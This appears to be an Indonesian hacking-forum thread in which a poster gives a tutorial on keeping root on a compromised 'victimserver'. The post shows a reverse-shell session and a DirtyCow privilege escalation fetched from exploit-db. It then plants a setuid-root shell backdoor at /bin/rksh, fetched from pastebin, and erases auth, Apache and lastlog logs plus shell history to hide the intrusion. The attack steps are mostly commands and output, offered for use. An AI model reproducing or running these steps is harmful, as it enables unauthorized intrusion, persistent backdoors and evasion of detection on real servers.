Mempertahankan akses root dengan suid program (rootkit)

by koboi - 12-27-2016 at 02:44 AM
Administrator
Administrators
Posts:
91
Joined:
Mar 2016
Likes:
2
Reputation:
0
2 Year Of Member
#1
OP
Posted: 12-27-2016, 02:44 AM (This post was last modified: 10-26-2017, 04:24 AM by koboi.)
Hallo guys, kali ini saya akan membahas cara mempertahankan akses root server yang sudah kita rooting sebelumnya. Dalam thread kali ini saya tidak akan ngomong panjang lebar, tapi akan memberikan penjelasan singkat. ilustrasi di bawah adalah server yang sudah saya backconnect dan di rooting servernya terlebih dahulu.


Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55116
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl https://www.exploit-db.com/download/40616 -s -o dirtycow.c
$ gcc dirtycow.c -o dirtycow -pthread
$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
id
uid=0(root) gid=0(root) groups=0(root)
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# curl https://pastebin.com/raw/MPqsAfsY -s -o suid.c
root@victimserver:/var/www/html# cat suid.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
root@victimserver:/var/www/html# gcc suid.c -o rksh
root@victimserver:/var/www/html# chmod +s rksh
root@victimserver:/var/www/html# mv rksh /bin/rksh

Di atas adalah ilustrasi server yang sudah kita rooting dan di sisipkan suid program di folder /bin/
Untuk mengeksekusi suid yang sudah kita buat tadi kita bisa langsung meng eksekusinya di user biasa dengan ilustrasi seperti ini.

Quote:root@backbox:~# nc -lvp 123
listening on [any] 123 ...
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55216
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ rksh
python -c "import pty; pty.spawn('/bin/bash')"
root@victimserver:/var/www/html# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@victimserver:/var/www/html#

Setelah kita melakukan aktivitas tersebut, alangkah baiknya kita menghapus log yang telah kita tinggalkan. Cukup hapus log yang perlu saja jangan terlalu rusuh ngehapus semua lognya. Think smart bro :v

Quote:root@victimserver:/var/www/html# echo "" > /var/log/auth.log
root@victimserver:/var/www/html# echo "" > /var/log/apache2/access.log
root@victimserver:/var/www/html# echo "" > /var/log/lastlog
root@victimserver:/var/www/html# history -c

Mungkin cukup sekian tutorial singkat dari saya.
Thanks for reading :
Reply
Find Posts
Hydrus
Hydrus
Posts:
28
Joined:
Jun 2016
Likes:
1
Reputation:
0
2 Year Of Member
#2
Posted: 12-27-2016, 12:35 PM
Alangkah keren nya kalo ada skrinsut om :D bagus lagi kalo ada pideoh
Nice
{There's no God in My Code}
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
2 Guest(s)